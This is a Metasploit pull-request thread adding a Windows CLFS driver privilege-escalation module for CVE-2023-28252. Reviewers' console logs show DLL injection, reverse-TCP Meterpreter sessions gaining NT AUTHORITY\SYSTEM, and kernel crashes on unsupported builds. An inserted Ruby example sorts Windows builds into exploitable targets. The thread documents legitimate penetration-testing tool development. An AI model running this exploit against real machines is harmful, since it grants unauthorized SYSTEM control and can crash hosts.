
CVE-2023-28252: Windows CLFS Driver Privilege Escalation #18250

Merged: 9 commits, merged Sep 14, 2023

Conversation

jheysel-r7 (Contributor)

@jheysel-r7 jheysel-r7 commented Aug 2, 2023

The module steals an NT AUTHORITY\SYSTEM level token and spawns a meterpreter session with the stolen token.
The module uses the Reflective DLL Template in conjunction with the following PoC in order to exploit the following versions of Windows: Windows 10 20H2, Windows 10 21H2, Windows 11 21H2 and Windows Server 2022.

@AkechiShiro

Is this stable yet to use? Or will it still BSOD any Windows version tested?

@jheysel-r7 (Contributor, Author)

> Is this stable yet to use? Or will it still BSOD any Windows version tested?

Hey @AkechiShiro, if you run the exploit multiple times on the versions of Windows outlined in the documentation and continuously exit the session you obtain, the machine will eventually BSOD. I need to change how the SYSTEM token, once stolen, is used to spawn a session to avoid a reference-counter-induced BSOD.


@jheysel-r7 jheysel-r7 marked this pull request as ready for review August 21, 2023 23:58
@jheysel-r7 jheysel-r7 added module a2k19 Hackathon 2019 in Austin docs and removed a2k19 Hackathon 2019 in Austin labels Aug 30, 2023
@jheysel-r7 (Contributor, Author)

> Is this stable yet to use? Or will it still BSOD any Windows version tested?

Hey @AkechiShiro, just wanted to let you know the stability issue has been resolved.

@sjanusz-r7 (Contributor)

sjanusz-r7 commented Sep 11, 2023

Tested on Windows 10 20H2 (OS Build 19042.508) with the PAYLOAD set to windows/x64/meterpreter/reverse_tcp:

msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > [*] Meterpreter session 8 opened (192.168.207.1:4444 -> 192.168.207.133:49673) at 2023-09-11 11:35:08 +0100

msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  8         meterpreter x64/windows  DESKTOP-U61G519\win20h2 @ DESKTOP-U61G519  192.168.207.1:4444 -> 192.168.207.133:49673 (192.168.207.133)

msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions -i -1
[*] Starting interaction with 8...

meterpreter > sysinfo
Computer        : DESKTOP-U61G519
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > bg
[*] Backgrounding session 8...
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > run session=-1 lhost=192.168.207.1 lport=4455

[*] Started reverse TCP handler on 192.168.207.1:4455
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is running windows version: 10.0.19042.0 which has a vulnerable version of clfs.sys installed by default
[*] Launching msiexec to host the DLL...
[+] Process 4092 launched.
[*] Reflectively injecting the DLL into 4092...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200774 bytes) to 192.168.207.133
[*] Meterpreter session 9 opened (192.168.207.1:4455 -> 192.168.207.133:49674) at 2023-09-11 11:35:23 +0100

meterpreter > sysinfo
Computer        : DESKTOP-U61G519
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > bg
[*] Backgrounding session 9...
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  8         meterpreter x64/windows  DESKTOP-U61G519\win20h2 @ DESKTOP-U61G519  192.168.207.1:4444 -> 192.168.207.133:49673 (192.168.207.133)
  9         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-U61G519      192.168.207.1:4455 -> 192.168.207.133:49674 (192.168.207.133)

However, on the following versions reported as vulnerable I'm getting a BSOD with KERNEL_SECURITY_CHECK_FAILURE every time:

Windows 10 - 1709 (16299.15)

msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  10        meterpreter x64/windows  DESKTOP-1VLS03T\win1709 @ DESKTOP-1VLS03T  192.168.207.1:4444 -> 192.168.207.130:49670 (192.168.207.130)

msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions -i -1
[*] Starting interaction with 10...

meterpreter > sysinfo
Computer        : DESKTOP-1VLS03T
OS              : Windows 10 (10.0 Build 16299).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > bg
[*] Backgrounding session 10...
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > run session=-1 lhost=192.168.207.1 lport=4455

[*] Started reverse TCP handler on 192.168.207.1:4455
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is running windows version: 10.0.16299.0 which has a vulnerable version of clfs.sys installed by default
[*] Launching msiexec to host the DLL...
[+] Process 8012 launched.
[*] Reflectively injecting the DLL into 8012...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.

Windows 10 - 1607 (14393.447)

msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  13        meterpreter x64/windows  DESKTOP-0C73FUJ\win1607 @ DESKTOP-0C73FUJ  192.168.207.1:4444 -> 192.168.207.132:49670 (192.168.207.132)

msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions -i -1
[*] Starting interaction with 13...

meterpreter > sysinfo
Computer        : DESKTOP-0C73FUJ
OS              : Windows 10 (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > bg
[*] Backgrounding session 13...
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > run session=-1 lhost=192.168.207.1 lport=4455

[*] Started reverse TCP handler on 192.168.207.1:4455
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is running windows version: 10.0.14393.0 which has a vulnerable version of clfs.sys installed by default
[*] Launching netsh to host the DLL...
[+] Process 4776 launched.
[*] Reflectively injecting the DLL into 4776...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.

@AkechiShiro

AkechiShiro commented Sep 11, 2023

@sjanusz-r7 How do you have access to multiple Windows builds? I have only found the latest build using evaluation ISOs?

EDIT: Sorry I tagged the wrong person

@jheysel-r7 (Contributor, Author)

> Tested on Windows 10 20H2 (OS Build 19042.508) with the PAYLOAD set to windows/x64/meterpreter/reverse_tcp:
>
> However, on the following versions reported as vulnerable I'm getting a BSOD with KERNEL_SECURITY_CHECK_FAILURE every time:

My apologies @sjanusz-r7, I hadn't updated the check method. Changes have been made; it should be good to run on the following versions: Windows 10 20H2, Windows 10 21H2, Windows 11 21H2 and Windows Server 2022.
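
The exchange above turns on the module's check method distinguishing builds that merely ship a vulnerable clfs.sys from builds the exploit can actually handle without crashing the kernel. The following is an added example of such a build-based check, written for this page and not the module's own code. The build numbers 19042 and 20348 come from the test output above; 19044 (Windows 10 21H2) and 22000 (Windows 11 21H2) are assumed from public release data; the result symbols (`:appears`, `:unsupported`, `:safe`, `:unknown`) are illustrative stand-ins for Metasploit's CheckCode objects so the snippet runs outside the framework.

```ruby
# Added example, not the Metasploit module's own code.
# Maps a Windows version string of the form the module prints
# ("10.0.19042.0") to one of four illustrative outcomes.

# Builds on which the review above reports a working SYSTEM session.
# 19042 and 20348 appear in the test output; 19044 and 22000 are assumed
# from public release data for Windows 10 21H2 and Windows 11 21H2.
SUPPORTED_BUILDS = {
  19042 => 'Windows 10 20H2',
  19044 => 'Windows 10 21H2',
  20348 => 'Windows Server 2022',
  22000 => 'Windows 11 21H2'
}.freeze

# Builds the earlier check flagged as vulnerable but on which the exploit
# produced KERNEL_SECURITY_CHECK_FAILURE in the review above.
UNSUPPORTED_VULNERABLE_BUILDS = {
  14393 => 'Windows 10 1607',
  16299 => 'Windows 10 1709'
}.freeze

# Extract the build number from "10.0.<build>.<revision>".
# Returns nil for anything that is not a Windows 10/11-style version string.
def parse_build(version_string)
  parts = version_string.to_s.split('.')
  return nil unless parts.length >= 3 && parts[0] == '10' && parts[1] == '0'

  Integer(parts[2], exception: false)
end

# Decide whether the exploit should be attempted on this build.
# Caveat: the revision component (the ".508" in "19042.508") is what would
# show whether the April 2023 patch is installed; the module's output prints
# it as ".0", so a build-only check can say "vulnerable clfs.sys by default"
# but not "currently unpatched".
def check_target(version_string)
  build = parse_build(version_string)
  return [:unknown, "unrecognised version string #{version_string.inspect}"] if build.nil?

  if SUPPORTED_BUILDS.key?(build)
    [:appears, "#{SUPPORTED_BUILDS[build]} (build #{build}) ships a vulnerable clfs.sys by default and is a supported target"]
  elsif UNSUPPORTED_VULNERABLE_BUILDS.key?(build)
    [:unsupported, "#{UNSUPPORTED_VULNERABLE_BUILDS[build]} (build #{build}) ships a vulnerable clfs.sys but the exploit is not supported there and may BSOD the host"]
  else
    [:safe, "build #{build} is not in this module's target set"]
  end
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample inputs: the two builds from the test output above,
  # one unsupported build, a build outside the target set, and garbage.
  ['10.0.19042.0', '10.0.20348.0', '10.0.16299.0', '10.0.22621.0', 'garbage'].each do |v|
    code, reason = check_target(v)
    puts "#{v.ljust(14)} -> #{code}: #{reason}"
  end
end
```

Refusing to run on the unsupported builds rather than treating every "vulnerable driver present" build as a target is the point: an elevation exploit that crashes the host is worse than no session, and the review above shows the crash reproducing on 1607 and 1709 every time.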

@sjanusz-r7 (Contributor)

For sanity:

Windows Server 2022 (Version 21H2 - Build 20348.169)

msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                  Connection
  --  ----  ----                     -----------                                  ----------
  3         meterpreter x64/windows  WIN-FHO12BB2U2O\winserver @ WIN-FHO12BB2U2O  192.168.207.1:4444 -> 192.168.207.134:49672 (192.168.207.134)

msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions -i -1
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : WIN-FHO12BB2U2O
OS              : Windows 2016+ (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > bg
[*] Backgrounding session 3...
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > run session=-1 lhost=192.168.207.1 lport=4455

[*] Started reverse TCP handler on 192.168.207.1:4455
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
[*] Launching msiexec to host the DLL...
[+] Process 6084 launched.
[*] Reflectively injecting the DLL into 6084...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200774 bytes) to 192.168.207.134
[*] Meterpreter session 4 opened (192.168.207.1:4455 -> 192.168.207.134:49673) at 2023-09-12 11:01:52 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Looks good 👍

@sjanusz-r7 sjanusz-r7 merged commit 8b56dc0 into rapid7:master Sep 14, 2023
34 checks passed
@sjanusz-r7 sjanusz-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 14, 2023
@sjanusz-r7 (Contributor)

Release Notes

Adds a new privilege escalation module that exploits a vulnerable clfs.sys driver on Windows to spawn a new NT AUTHORITY\SYSTEM Meterpreter session. The vulnerable driver comes installed by default on Windows 10 21H2, Windows 11 21H2 and Windows Server 2022 (Build 20348) operating systems.

Successfully merging this pull request may close these issues.

CVE-2023-28252: Windows CLFS Privilege Escalation.